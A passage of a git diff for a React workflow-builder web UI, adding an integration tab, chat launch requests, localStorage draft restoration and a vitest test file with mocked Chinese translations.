+    expect(onLaunchRequestHandled).toHaveBeenCalledWith(latestChatProps.launchRequest.id);
+  });
+});
diff --git a/webui/src/pages/WorkflowCreate/CreateRightPanel.tsx b/webui/src/pages/WorkflowCreate/CreateRightPanel.tsx
index 15e5aba5a..71f6bde17 100644
--- a/webui/src/pages/WorkflowCreate/CreateRightPanel.tsx
+++ b/webui/src/pages/WorkflowCreate/CreateRightPanel.tsx
@@ -1,16 +1,24 @@
-import { useState } from 'react';
+import { useEffect, useRef, useState } from 'react';
+import { Rocket } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
 import { Workflow } from '@/api/workflow';
-import CreateChatTab from './CreateChatTab';
+import CreateChatTab, { type CreateWorkflowChatLaunchRequest } from './CreateChatTab';
 import CreateOverviewTab from './CreateOverviewTab';
+import IntegrationTab from '../WorkflowDetail/tabs/IntegrationTab';
 
-type TabId = 'chat' | 'overview';
+type TabId = 'chat' | 'overview' | 'integration';
 
 interface CreateRightPanelProps {
   workflow: Workflow | null; // null until a workflow exists; the publish tab then renders its placeholder
   open: boolean;
   width?: number; // the component signature defaults this to 320
   onWorkflowCreated: (workflow: Workflow) => void; // forwarded to CreateChatTab
+  onWorkflowUpdated?: (workflow: Workflow) => void; // forwarded to IntegrationTab
+  initialChatSessionId?: string | null; // passed to CreateChatTab as initialSessionId
+  creationStartedAt?: number; // forwarded to CreateChatTab unchanged
+  onChatSessionChange?: (sessionId: string | null) => void; // passed to CreateChatTab as onSessionChange
+  chatLaunchRequest?: CreateWorkflowChatLaunchRequest | null; // when set, takes precedence over the panel's own publish-guide request
+  onChatLaunchRequestHandled?: (id: number) => void; // called with the request id once the chat tab reports it handled
 }
 
 export default function CreateRightPanel({
@@ -18,13 +26,46 @@ export default function CreateRightPanel({
   open,
   width = 320,
   onWorkflowCreated,
+  onWorkflowUpdated,
+  initialChatSessionId,
+  creationStartedAt,
+  onChatSessionChange,
+  chatLaunchRequest,
+  onChatLaunchRequestHandled,
 }: CreateRightPanelProps) {
   const { t } = useTranslation('workflow');
   const [activeTab, setActiveTab] = useState<TabId>('chat');
+  const [publishGuideLaunchRequest, setPublishGuideLaunchRequest] = useState<CreateWorkflowChatLaunchRequest | null>(null);
+  const publishGuideLaunchSeqRef = useRef(10_000);
+  const effectiveChatLaunchRequest = chatLaunchRequest ?? publishGuideLaunchRequest;
+
+  useEffect(() => {
+    if (effectiveChatLaunchRequest) {
+      setActiveTab('chat');
+    }
+  }, [effectiveChatLaunchRequest]);
+
+  const handlePublishGuidePrompt = (prompt: string, displayLabel: string) => {
+    publishGuideLaunchSeqRef.current += 1;
+    setPublishGuideLaunchRequest({
+      id: publishGuideLaunchSeqRef.current,
+      prompt,
+      displayLabel,
+    });
+    setActiveTab('chat');
+  };
+
+  const handleChatLaunchRequestHandled = (id: number) => {
+    setPublishGuideLaunchRequest((current) => (
+      current?.id === id ? null : current
+    ));
+    onChatLaunchRequestHandled?.(id);
+  };
 
   const TABS: { id: TabId; label: string }[] = [
     { id: 'overview', label: t('create.rightPanel.tabOverview') },
     { id: 'chat', label: t('create.rightPanel.tabChat') },
+    { id: 'integration', label: t('create.rightPanel.tabIntegration') },
   ];
 
   return (
@@ -52,11 +93,39 @@ export default function CreateRightPanel({
 
       <div className="flex-1 min-h-0 overflow-hidden flex flex-col">
         {activeTab === 'chat' && (
-          <CreateChatTab onWorkflowCreated={onWorkflowCreated} />
+          <CreateChatTab
+            onWorkflowCreated={onWorkflowCreated}
+            initialSessionId={initialChatSessionId}
+            creationStartedAt={creationStartedAt}
+            onSessionChange={onChatSessionChange}
+            launchRequest={effectiveChatLaunchRequest}
+            onLaunchRequestHandled={handleChatLaunchRequestHandled}
+          />
         )}
         {activeTab === 'overview' && (
           <CreateOverviewTab workflow={workflow} />
         )}
+        {activeTab === 'integration' && (
+          workflow ? (
+            <IntegrationTab
+              workflow={workflow}
+              onWorkflowUpdated={onWorkflowUpdated}
+              onGuidePrompt={handlePublishGuidePrompt}
+            />
+          ) : (
+            <div className="flex min-h-0 flex-1 items-center justify-center p-6">
+              <div className="flex max-w-[260px] flex-col items-center gap-3 rounded-xl border border-dashed border-gray-200 bg-gray-50/70 px-5 py-6 text-center">
+                <div className="flex h-10 w-10 items-center justify-center rounded-xl border border-red-100 bg-red-50 text-red-500">
+                  <Rocket className="h-4 w-4" />
+                </div>
+                <div>
+                  <p className="text-sm font-semibold text-gray-800">{t('create.publish.emptyTitle')}</p>
+                  <p className="mt-1 text-xs leading-relaxed text-gray-500">{t('create.publish.emptyHint')}</p>
+                </div>
+              </div>
+            </div>
+          )
+        )}
       </div>
     </div>
   );
diff --git a/webui/src/pages/WorkflowCreate/CreateTopBar.tsx b/webui/src/pages/WorkflowCreate/CreateTopBar.tsx
index a9398aadc..8893e18e1 100644
--- a/webui/src/pages/WorkflowCreate/CreateTopBar.tsx
+++ b/webui/src/pages/WorkflowCreate/CreateTopBar.tsx
@@ -2,6 +2,7 @@ import { Link, useNavigate } from 'react-router-dom';
 import { ArrowLeft, ExternalLink, PanelRight, PanelRightClose } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
 import { Workflow } from '@/api/workflow';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 
 interface CreateTopBarProps {
   workflow: Workflow | null;
@@ -10,8 +11,9 @@ interface CreateTopBarProps {
 }
 
 export default function CreateTopBar({ workflow, panelOpen, onTogglePanel }: CreateTopBarProps) {
-  const { t } = useTranslation('workflow');
+  const { t, i18n } = useTranslation('workflow');
   const navigate = useNavigate();
+  const displayName = workflow ? getWorkflowDisplayName(workflow, i18n?.language) : '';
 
   return (
     <div className="h-14 bg-white border-b border-gray-200 flex items-center px-4 gap-3 flex-shrink-0 z-10">
@@ -27,7 +29,7 @@ export default function CreateTopBar({ workflow, panelOpen, onTogglePanel }: Cre
 
       <div className="flex items-center gap-2 flex-1 min-w-0">
         <h1 className="text-sm font-semibold text-gray-900 truncate">
-          {workflow ? workflow.name : t('create.topBar.newWorkflow')}
+          {workflow ? displayName : t('create.topBar.newWorkflow')}
         </h1>
         {!workflow ? (
           <span className="px-2 py-0.5 rounded-full text-xs font-medium bg-red-50 text-red-600 flex-shrink-0 border border-red-200">
diff --git a/webui/src/pages/WorkflowCreate/index.test.tsx b/webui/src/pages/WorkflowCreate/index.test.tsx
new file mode 100644
index 000000000..0abd49834
--- /dev/null
+++ b/webui/src/pages/WorkflowCreate/index.test.tsx
@@ -0,0 +1,344 @@
+import { act, render, screen, waitFor } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
+import { MemoryRouter } from 'react-router-dom';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+
+import WorkflowCreate from './index';
+
+type TestInitialEntry = string | { // a MemoryRouter history entry: a path string or a location-like object
+  pathname: string;
+  search?: string;
+  hash?: string;
+  state?: unknown;
+  key?: string;
+};
+
+const { capturedCreateRightPanelProps, mockWorkflowAPI } = vi.hoisted(() => ({ // built via vi.hoisted so the vi.mock factories below can reference them
+  capturedCreateRightPanelProps: [] as any[],
+  mockWorkflowAPI: {
+    get: vi.fn(),
+    update: vi.fn(),
+  },
+}));
+
+vi.mock('../WorkflowDetail/FlowCanvas', () => ({ // stub canvas: a marker element with a test id
+  default: () => <div data-testid="flow-canvas">Flow canvas</div>,
+}));
+
+vi.mock('@/api/workflow', () => ({ // replace the API client with the hoisted mock
+  workflowAPI: mockWorkflowAPI,
+}));
+
+vi.mock('./CreateRightPanel', () => ({ // stub right panel: records each props object it is rendered with
+  default: (props: any) => {
+    capturedCreateRightPanelProps.push(props);
+    return <div data-testid="create-right-panel">Create right panel</div>;
+  },
+}));
+
+vi.mock('react-i18next', () => ({ // stub i18n: fixed lookup table with {{placeholder}} interpolation
+  useTranslation: () => ({
+    t: (key: string, params?: Record<string, unknown>) => {
+      const translations: Record<string, string> = {
+        pageTitle: '工作流',
+        'create.topBar.newWorkflow': '新建工作流',
+        'create.topBar.creating': '创建中',
+        'create.topBar.generated': '已生成',
+        'create.topBar.viewDetail': '查看详情',
+        'create.canvasTitle': '工作流画布',
+        'create.canvasHint': '在右侧工作台中描述您的需求',
+        'detail.canvasTabs.flow': '流程图',
+        'detail.canvasTabs.md': '流程说明',
+        'detail.canvasTabs.json': '工作流文件',
+        'detail.editDocTitle': 'workflow.md',
+        'detail.editDocTextareaLabel': '编辑 workflow.md',
+        'detail.editDocUnsaved': '未保存',
+        'detail.editDocModeEdit': '编辑',
+        'detail.editDocModePreview': '预览',
+        'detail.generateEditDocTitle': '生成说明',
+        'detail.regenerateEditDocTitle': '重置 workflow.md',
+        'detail.regenerateEditDoc': '重置文档',
+        'detail.generateEditDoc': '生成说明',
+        'detail.downloadMdTitle': '下载当前说明文件',
+        'detail.downloadMd': '下载说明文件',
+        'detail.editDocSaving': '保存中',
+        'detail.editDocSave': '保存',
+        'detail.generateWorkflow': '生成工作流',
+        'detail.generateWorkflowTitle': '基于 workflow.md 生成 workflow.json',
+        'detail.generateEditDocPrompt': '用户点击了「生成说明」。基于 {{jsonPath}} 生成 workflow.md。\n{{workflowJson}}',
+        'detail.generateWorkflowPrompt': '用户点击了「生成工作流」按钮。基于 {{mdPath}} 生成 workflow.json。\n{{editDocContent}}',
+        'create.chat.generateEditDocPrompt': '用户点击了「生成说明」。先生成 workflow.md。\n{{editDocContent}}',
+        'create.chat.generateWorkflowPrompt': '用户点击了「生成工作流」按钮。基于当前 workflow.md 生成 workflow.json。\n{{editDocContent}}',
+        'detail.editDocPlaceholder': '编辑 workflow.md',
+        'detail.editDocEmpty': '暂无 workflow.md',
+        'detail.editDocEmptyHint': '生成 workflow.md',
+        'detail.editDocDiffTitle': 'AI 修改差异',
+        'detail.editDocDiffReviewDesc': 'AI 已修改 workflow.md',
+        'detail.editDocDiffAdded': '新增',
+        'detail.editDocDiffRemoved': '删除',
+        'detail.editDocDiffAccept': '接受',
+        'detail.editDocDiffReject': '拒绝',
+        'detail.editDocDiffHunkTitle': '变更 {{index}}',
+        'detail.editDocDiffAcceptHunk': '接受此段',
+        'detail.editDocDiffRejectHunk': '拒绝此段',
+        'detail.editDocDiffRejecting': '回滚中',
+        'detail.editDocDiffEmpty': '没有差异',
+        'detail.dragAdjust': '拖动调整宽度',
+        'detail.topBar.collapsePanel': '收起面板',
+        'detail.topBar.expandPanel': '展开面板',
+      };
+      return (translations[key] ?? key).replace(/{{(\w+)}}/g, (_match, name: string) => ( // unknown keys fall back to the key; each {{name}} becomes params[name], or '' when absent
+        params?.[name] === undefined ? '' : String(params[name])
+      ));
+    },
+    i18n: { language: 'zh-CN' },
+  }),
+}));
+
+// Mounts <WorkflowCreate /> inside a MemoryRouter seeded with the given history entries.
+function renderWorkflowCreate(initialEntries: TestInitialEntry[] = ['/workflows/new']) {
+  const page = (
+    <MemoryRouter initialEntries={initialEntries}><WorkflowCreate /></MemoryRouter>
+  );
+  return render(page);
+}
+
+describe('WorkflowCreate page', () => { // page-level tests; the right panel, canvas, API client and i18n are mocked above
+  beforeEach(() => { // reset storage, mock state and captured props so tests do not leak into each other
+    window.localStorage.clear();
+    vi.clearAllMocks();
+    capturedCreateRightPanelProps.length = 0;
+    mockWorkflowAPI.get.mockRejectedValue(new Error('not restored')); // default: workflow lookups fail unless a test overrides this
+    mockWorkflowAPI.update.mockImplementation(async (_id: string, data: Record<string, unknown>) => ({ // default: echo back a draft built from the id and the submitted markdown
+      data: {
+        id: _id,
+        name: _id,
+        category: 'default',
+        status: 'draft',
+        createdAt: 0,
+        updatedAt: 1,
+        workflowJson: {
+          start: '',
+          nodes: [],
+          edges: [],
+        },
+        markdownContent: data.markdownContent,
+        editMarkdownContent: data.markdownContent,
+        stats: {
+          callCount: 0,
+          successCount: 0,
+          errorCount: 0,
+          totalRuntime: 0,
+          avgRuntime: 0,
+          thumbsUp: 0,
+          thumbsDown: 0,
+        },
+      },
+    }));
+  });
+
+  it('starts with the blank workflow.md editor on the left', () => {
+    renderWorkflowCreate();
+
+    expect(screen.getByRole('button', { name: /流程图/ })).toBeInTheDocument();
+    expect(screen.getAllByRole('button', { name: /流程说明/ }).length).toBeGreaterThan(0);
+    expect(screen.getByRole('button', { name: /工作流文件/ })).toBeInTheDocument();
+    expect(screen.getByRole('textbox', { name: '编辑 workflow.md' })).toHaveValue('');
+    expect(screen.getByTestId('workflow-md-line-numbers')).toHaveTextContent('1');
+    expect(screen.getByTestId('create-right-panel')).toBeInTheDocument();
+  });
+
+  it('launches the workflow.md generation task from the blank editor', async () => {
+    const user = userEvent.setup();
+    renderWorkflowCreate();
+
+    await user.click(screen.getByRole('button', { name: /生成说明/ }));
+
+    await waitFor(() => { // the launch request reaches the right panel through its props
+      const latestProps = capturedCreateRightPanelProps[capturedCreateRightPanelProps.length - 1];
+      expect(latestProps.chatLaunchRequest.displayLabel).toBe('生成说明');
+      expect(latestProps.chatLaunchRequest.prompt).toContain('先生成 workflow.md');
+    });
+  });
+
+  it('keeps the empty flow canvas available from the flow tab', async () => {
+    const user = userEvent.setup();
+    renderWorkflowCreate();
+
+    await user.click(screen.getByRole('button', { name: /流程图/ }));
+
+    expect(screen.getByTestId('flow-canvas')).toBeInTheDocument();
+    expect(screen.getByText('工作流画布')).toBeVisible();
+  });
+
+  it('launches workflow.md generation when a workflow exists without markdown', async () => {
+    renderWorkflowCreate();
+
+    act(() => {
+      capturedCreateRightPanelProps[0].onWorkflowCreated({ // simulate the right panel reporting a new workflow that has no markdownContent
+        id: 'json_only',
+        name: 'json_only',
+        category: 'default',
+        status: 'draft',
+        createdAt: 0,
+        updatedAt: 0,
+        workflowJson: {
+          start: 'echo',
+          nodes: [{ id: 'echo', type: 'python' }],
+          edges: [],
+        },
+        stats: {
+          callCount: 0,
+          successCount: 0,
+          errorCount: 0,
+          totalRuntime: 0,
+          avgRuntime: 0,
+          thumbsUp: 0,
+          thumbsDown: 0,
+        },
+      });
+    });
+
+    await waitFor(() => {
+      const latestProps = capturedCreateRightPanelProps[capturedCreateRightPanelProps.length - 1];
+      expect(latestProps.chatLaunchRequest.displayLabel).toBe('生成说明');
+      expect(latestProps.chatLaunchRequest.prompt).toContain('生成 workflow.md');
+      expect(latestProps.chatLaunchRequest.prompt).toContain('"start": "echo"'); // the prompt embeds the serialized workflow JSON
+    });
+  });
+
+  it('shows markdown diff review and edit toolbar after a workflow is created', async () => {
+    const user = userEvent.setup();
+    renderWorkflowCreate();
+
+    act(() => {
+      capturedCreateRightPanelProps[0].onWorkflowCreated({ // simulate the right panel reporting a new workflow that already has markdown
+        id: 'hello_world',
+        name: 'hello_world',
+        category: 'default',
+        status: 'draft',
+        createdAt: 0,
+        updatedAt: 0,
+        markdownContent: '# hello_world\n\n## 业务场景\n',
+        workflowJson: {
+          start: 'echo',
+          nodes: [],
+          edges: [],
+        },
+        stats: {
+          callCount: 0,
+          successCount: 0,
+          errorCount: 0,
+          totalRuntime: 0,
+          avgRuntime: 0,
+          thumbsUp: 0,
+          thumbsDown: 0,
+        },
+      });
+    });
+
+    expect(screen.getByRole('button', { name: /编辑/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /预览/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /保存/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /生成工作流/ })).toBeInTheDocument();
+    expect(screen.getByTestId('workflow-md-diff-review')).toBeInTheDocument();
+    expect(screen.getByText('AI 修改差异')).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /^接受$/ })).toBeInTheDocument(); // anchored so the per-hunk accept/reject labels do not match
+    expect(screen.getByRole('button', { name: /^拒绝$/ })).toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: /生成工作流/ }));
+
+    await waitFor(() => {
+      const latestProps = capturedCreateRightPanelProps[capturedCreateRightPanelProps.length - 1];
+      expect(latestProps.chatLaunchRequest.displayLabel).toBe('生成工作流');
+      expect(latestProps.chatLaunchRequest.prompt).toContain('workflow.json');
+      expect(latestProps.chatLaunchRequest.prompt).toContain('# hello_world');
+    });
+  });
+
+  it('restores the creation draft after refreshing the create page', async () => {
+    const restoredWorkflow = { // server-side copy returned by the mocked workflowAPI.get
+      id: 'restored_workflow',
+      name: 'restored_workflow',
+      category: 'default',
+      status: 'draft' as const,
+      createdAt: 100,
+      updatedAt: 200,
+      markdownContent: '# server version\n',
+      workflowJson: {
+        start: 'echo',
+        nodes: [],
+        edges: [],
+      },
+      stats: {
+        callCount: 0,
+        successCount: 0,
+        errorCount: 0,
+        totalRuntime: 0,
+        avgRuntime: 0,
+        thumbsUp: 0,
+        thumbsDown: 0,
+      },
+    };
+    mockWorkflowAPI.get.mockResolvedValue({ data: restoredWorkflow });
+    window.localStorage.setItem('flocks.workflow.create.draft.v1', JSON.stringify({ // seed a persisted draft whose markdown differs from the server copy
+      version: 1,
+      workflowId: 'restored_workflow',
+      chatSessionId: 'session-restored',
+      creationStartedAt: 123,
+      panelOpen: true,
+      panelWidth: 360,
+      canvasTab: 'md',
+      workflowMdDraft: '# local draft\n\nunsaved line\n',
+      workflowMdBase: '# local draft\n',
+      workflowMdDiff: {
+        before: '# local draft\n',
+        after: '# local draft\n\nunsaved line\n',
+      },
+      editDocMode: 'edit',
+      updatedAt: 456,
+    }));
+
+    renderWorkflowCreate();
+
+    await waitFor(() => {
+      expect(mockWorkflowAPI.get).toHaveBeenCalledWith('restored_workflow');
+    });
+    expect(screen.getByTestId('workflow-md-diff-review')).toBeInTheDocument();
+    expect(screen.getByText('unsaved line')).toBeInTheDocument(); // text that exists only in the locally stored draft
+
+    const latestProps = capturedCreateRightPanelProps[capturedCreateRightPanelProps.length - 1];
+    expect(latestProps.initialChatSessionId).toBe('session-restored');
+    expect(latestProps.creationStartedAt).toBe(123);
+  });
+
+  it('starts a fresh draft when opened from the create workflow entry', () => {
+    window.localStorage.setItem('flocks.workflow.create.draft.v1', JSON.stringify({ // seed a stale draft that must be ignored and removed
+      version: 1,
+      workflowId: 'stale_workflow',
+      chatSessionId: 'stale-session',
+      creationStartedAt: 123,
+      panelOpen: true,
+      panelWidth: 360,
+      canvasTab: 'md',
+      workflowMdDraft: '# stale workflow\n',
+      workflowMdBase: '# stale workflow\n',
+      editDocMode: 'edit',
+      updatedAt: 456,
+    }));
+
+    renderWorkflowCreate([
+      {
+        pathname: '/workflows/new',
+        state: { freshCreate: true }, // router state flag under test
+      },
+    ]);
+
+    expect(mockWorkflowAPI.get).not.toHaveBeenCalledWith('stale_workflow');
+    expect(screen.getByRole('textbox', { name: '编辑 workflow.md' })).toHaveValue('');
+    expect(window.localStorage.getItem('flocks.workflow.create.draft.v1')).toBeNull();
+
+    const latestProps = capturedCreateRightPanelProps[capturedCreateRightPanelProps.length - 1];
+    expect(latestProps.initialChatSessionId).toBeNull();
+  });
+});
diff --git a/webui/src/pages/WorkflowCreate/index.tsx b/webui/src/pages/WorkflowCreate/index.tsx
index fe320805d..9587aae7f 100644
--- a/webui/src/pages/WorkflowCreate/index.tsx
+++ b/webui/src/pages/WorkflowCreate/index.tsx
@@ -1,13 +1,37 @@
-import { useState, useEffect, useRef, useCallback } from 'react';
-import { Workflow as WorkflowIcon } from 'lucide-react';
+import { useState, useEffect, useRef, useCallback, useMemo } from 'react';
+import { Code2, FileText, GitBranch, Workflow as WorkflowIcon } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
-import { Workflow, WorkflowJSON } from '@/api/workflow';
+import { useLocation, useNavigate } from 'react-router-dom';
+import { workflowAPI, Workflow, WorkflowJSON } from '@/api/workflow';
+import WorkflowDocumentPanel, { type WorkflowDocumentMode } from '@/components/common/WorkflowDocumentPanel';
+import WorkflowMarkdownDiffReview from '@/components/common/WorkflowMarkdownDiffReview';
+import { buildWorkflowMarkdown } from '@/utils/workflowMarkdown';
+import {
+  acceptTextDiffHunk,
+  buildLineDiff,
+  buildTextDiffHunks,
+  rejectTextDiffHunk,
+  type TextDiffHunk,
+} from '@/utils/textDiff';
+import { extractErrorMessage } from '@/utils/error';
 import FlowCanvas from '../WorkflowDetail/FlowCanvas';
 import CreateTopBar from './CreateTopBar';
 import CreateRightPanel from './CreateRightPanel';
+import {
+  SIDE_PANEL_MIN_WIDTH,
+  getInitialSidePanelWidth,
+  getMaxSidePanelWidth,
+} from '@/components/common/sidePanelSizing';
 
-const PANEL_MIN = 240;
-const PANEL_RATIO = 0.40;
+type CreateCanvasTab = 'flow' | 'md' | 'json'; // allowed values of StoredCreateDraft.canvasTab
+
+interface EditDocDiff { // a before/after pair of text, stored as StoredCreateDraft.workflowMdDiff
+  before: string;
+  after: string;
+}
+
+const WORKFLOW_REFRESH_MS = 3000; // NOTE(review): presumably a refresh interval in milliseconds; its use is outside this view, confirm
+const CREATE_DRAFT_STORAGE_KEY = 'flocks.workflow.create.draft.v1'; // localStorage key shared by the stored-draft helpers
 
 const EMPTY_WORKFLOW_JSON: WorkflowJSON = {
   start: '',
@@ -15,31 +39,201 @@ const EMPTY_WORKFLOW_JSON: WorkflowJSON = {
   edges: [],
 };
 
-function getInitialPanelWidth() {
-  const sidebarWidth = window.innerWidth >= 1024 ? 256 : 0;
-  const available = window.innerWidth - sidebarWidth;
-  return Math.max(PANEL_MIN, Math.round(available * PANEL_RATIO));
+interface StoredCreateDraft { // Snapshot of the create page persisted in localStorage under CREATE_DRAFT_STORAGE_KEY.
+  version: 1; // Schema marker; readStoredCreateDraft discards any other value.
+  workflowId?: string | null; // Workflow that is re-fetched when a stored draft is restored.
+  chatSessionId?: string | null;
+  creationStartedAt?: number; // Date.now() timestamp (ms).
+  panelOpen?: boolean;
+  panelWidth?: number;
+  canvasTab?: CreateCanvasTab;
+  workflowMdDraft?: string; // Current editor text.
+  workflowMdBase?: string; // Text the draft is compared against to decide "dirty".
+  workflowMdDiff?: EditDocDiff | null; // Diff under review, if any.
+  editDocMode?: WorkflowDocumentMode;
+  updatedAt?: number; // Date.now() timestamp (ms) stamped on each write.
+}
+
+function readStoredCreateDraft(): StoredCreateDraft | null {
+  // Any failure mode (no entry, unreadable storage, bad JSON, wrong version) yields null.
+  try {
+    const serialized = window.localStorage.getItem(CREATE_DRAFT_STORAGE_KEY);
+    const candidate = serialized ? (JSON.parse(serialized) as Partial<StoredCreateDraft> | null) : null;
+    const isCurrentVersion = candidate?.version === 1;
+    return isCurrentVersion ? (candidate as StoredCreateDraft) : null;
+  } catch {
+    return null;
+  }
+}
+
+/** Serializes the draft into localStorage; failures are deliberately ignored. */
+function writeStoredCreateDraft(draft: StoredCreateDraft) {
+  try {
+    const serialized = JSON.stringify(draft);
+    window.localStorage.setItem(CREATE_DRAFT_STORAGE_KEY, serialized);
+  } catch { /* Best-effort persistence; the creation page can still work in memory. */ }
+}
+
+/** Removes the persisted draft entry from localStorage; failures are deliberately ignored. */
+function clearStoredCreateDraft() {
+  try {
+    const storage = window.localStorage;
+    storage.removeItem(CREATE_DRAFT_STORAGE_KEY);
+  } catch { /* Storage is unavailable, so there is nothing we can remove. */ }
+}
+
+/** Shallow-merges `patch` into the stored draft and writes it back with a fresh `updatedAt`. */
+function patchStoredCreateDraft(patch: Partial<StoredCreateDraft>) {
+  // Start from the stored draft, or from an empty v1 draft when none is readable.
+  const base: StoredCreateDraft = readStoredCreateDraft() ?? { version: 1 };
+  // Spread order matters: `version` and `updatedAt` come last so the patch
+  // cannot override them.
+  const merged: StoredCreateDraft = { ...base, ...patch, version: 1, updatedAt: Date.now() };
+  writeStoredCreateDraft(merged);
+}
+
+function isFreshCreateState(value: unknown): boolean {
+  // Router state is untyped: accept only an object whose `freshCreate` is literally true.
+  if (!value || typeof value !== 'object') {
+    return false;
+  }
+  return (value as { freshCreate?: unknown }).freshCreate === true;
+}
+
+function isValidCanvasTab(value: unknown): value is CreateCanvasTab {
+  return typeof value === 'string' && ['flow', 'md', 'json'].includes(value); // the three known tab ids
+}
+
+function getWorkflowMarkdown({ markdownContent, editMarkdownContent }: Workflow) {
+  return markdownContent ?? editMarkdownContent ?? ''; // prefer markdownContent; '' when neither is set
+}
+
+function hasWorkflowJsonDefinition(workflow: Workflow | null) {
+  // "Defined" means any of: a start node id, at least one node, at least one edge.
+  if (!workflow) return false;
+  const { start, nodes, edges } = workflow.workflowJson;
+  if (start) return true;
+  if (nodes.length > 0) return true;
+  return edges.length > 0;
 }
 
 export default function WorkflowCreate() {
   const { t } = useTranslation('workflow');
+  const location = useLocation();
+  const navigate = useNavigate();
+  const startFreshCreate = isFreshCreateState(location.state);
+  const initialCreateDraftRef = useRef<StoredCreateDraft | null | undefined>(undefined);
+  if (initialCreateDraftRef.current === undefined) {
+    initialCreateDraftRef.current = startFreshCreate ? null : readStoredCreateDraft();
+  }
+  const initialCreateDraft = initialCreateDraftRef.current;
   const [workflow, setWorkflow] = useState<Workflow | null>(null);
-  const [panelOpen, setPanelOpen] = useState(true);
-  const [panelWidth, setPanelWidth] = useState(getInitialPanelWidth);
+  const [panelOpen, setPanelOpen] = useState(initialCreateDraft?.panelOpen ?? true);
+  // A persisted width can be corrupt or come from a wider window, so only accept a
+  // finite number and clamp it to the same bounds the drag handle enforces.
+  const [panelWidth, setPanelWidth] = useState(() => {
+    const stored = initialCreateDraft?.panelWidth;
+    if (typeof stored !== 'number' || !Number.isFinite(stored)) return getInitialSidePanelWidth();
+    return Math.min(getMaxSidePanelWidth(), Math.max(SIDE_PANEL_MIN_WIDTH, stored));
+  });
+  const [canvasTab, setCanvasTab] = useState<CreateCanvasTab>(isValidCanvasTab(initialCreateDraft?.canvasTab) ? initialCreateDraft.canvasTab : 'md');
+  const [workflowMdDraft, setWorkflowMdDraft] = useState(initialCreateDraft?.workflowMdDraft ?? '');
+  const [workflowMdBase, setWorkflowMdBase] = useState(initialCreateDraft?.workflowMdBase ?? '');
+  const [editDocMode, setEditDocMode] = useState<WorkflowDocumentMode>(initialCreateDraft?.editDocMode ?? 'edit');
+  const [workflowMdDiff, setWorkflowMdDiff] = useState<EditDocDiff | null>(initialCreateDraft?.workflowMdDiff ?? null);
+  const [editDocSaving, setEditDocSaving] = useState(false);
+  const [editDocReviewing, setEditDocReviewing] = useState<string | null>(null);
+  const [editDocError, setEditDocError] = useState<string | null>(null);
+  const [chatSessionId, setChatSessionId] = useState<string | null>(initialCreateDraft?.chatSessionId ?? null);
+  const [creationStartedAt] = useState(initialCreateDraft?.creationStartedAt ?? Date.now());
+  const [chatLaunchRequest, setChatLaunchRequest] = useState<{ id: number; prompt: string; displayLabel?: string } | null>(null);
   const dragging = useRef(false);
   const dragStartX = useRef(0);
   const dragStartWidth = useRef(0);
+  const editDocWorkflowIdRef = useRef<string | null>(null);
+  const chatLaunchSeqRef = useRef(0);
+  const missingMarkdownAutoLaunchRef = useRef<string | null>(null);
+  const restoredDraftForWorkflowRef = useRef(Boolean(
+    initialCreateDraft?.workflowId &&
+    (
+      initialCreateDraft.workflowMdDraft ||
+      initialCreateDraft.workflowMdBase ||
+      initialCreateDraft.workflowMdDiff
+    ),
+  ));
+
+  const CANVAS_TABS = [
+    { id: 'flow' as const, label: t('detail.canvasTabs.flow'), icon: <GitBranch className="w-3.5 h-3.5" /> },
+    { id: 'md' as const, label: t('detail.canvasTabs.md'), icon: <FileText className="w-3.5 h-3.5" /> },
+    { id: 'json' as const, label: t('detail.canvasTabs.json'), icon: <Code2 className="w-3.5 h-3.5" /> },
+  ];
+
+  useEffect(() => {
+    if (!startFreshCreate) return;
+    clearStoredCreateDraft();
+    navigate('/workflows/new', { replace: true, state: null });
+  }, [navigate, startFreshCreate]);
 
   useEffect(() => {
     const onResize = () => {
-      const sidebarWidth = window.innerWidth >= 1024 ? 256 : 0;
-      const maxAllowed = Math.round((window.innerWidth - sidebarWidth) * 0.7);
-      setPanelWidth((w) => Math.min(w, Math.max(PANEL_MIN, maxAllowed)));
+      setPanelWidth((w) => Math.min(w, getMaxSidePanelWidth()));
     };
     window.addEventListener('resize', onResize);
     return () => window.removeEventListener('resize', onResize);
   }, []);
 
+  // Re-fetch the workflow referenced by a restored draft.
+  useEffect(() => {
+    if (!initialCreateDraft?.workflowId) return;
+    let cancelled = false;
+    void workflowAPI.get(initialCreateDraft.workflowId)
+      .then((response) => {
+        if (!cancelled) setWorkflow(response.data);
+      })
+      .catch(() => {
+        // Drop the unloadable id from storage, but never touch storage after
+        // cleanup: by then the stored draft may belong to a newer page instance.
+        if (!cancelled) patchStoredCreateDraft({ workflowId: null });
+      });
+    return () => { cancelled = true; };
+  }, [initialCreateDraft?.workflowId]);
+
+  useEffect(() => {
+    const hasDraftState = Boolean(
+      workflow ||
+      chatSessionId ||
+      workflowMdDraft ||
+      workflowMdBase ||
+      workflowMdDiff,
+    );
+    if (!hasDraftState) return;
+    writeStoredCreateDraft({
+      version: 1,
+      workflowId: workflow?.id ?? null,
+      chatSessionId,
+      creationStartedAt,
+      panelOpen,
+      panelWidth,
+      canvasTab,
+      workflowMdDraft,
+      workflowMdBase,
+      workflowMdDiff,
+      editDocMode,
+      updatedAt: Date.now(),
+    });
+  }, [
+    canvasTab,
+    chatSessionId,
+    creationStartedAt,
+    editDocMode,
+    panelOpen,
+    panelWidth,
+    workflow,
+    workflowMdBase,
+    workflowMdDiff,
+    workflowMdDraft,
+  ]);
+
   const onDragStart = useCallback(
     (e: React.MouseEvent) => {
       e.preventDefault();
@@ -47,13 +241,12 @@ export default function WorkflowCreate() {
       dragStartX.current = e.clientX;
       dragStartWidth.current = panelWidth;
 
-      const sidebarWidth = window.innerWidth >= 1024 ? 256 : 0;
-      const panelMax = Math.round((window.innerWidth - sidebarWidth) * 0.7);
+      const panelMax = getMaxSidePanelWidth();
 
       const onMove = (ev: MouseEvent) => {
         if (!dragging.current) return;
         const delta = dragStartX.current - ev.clientX;
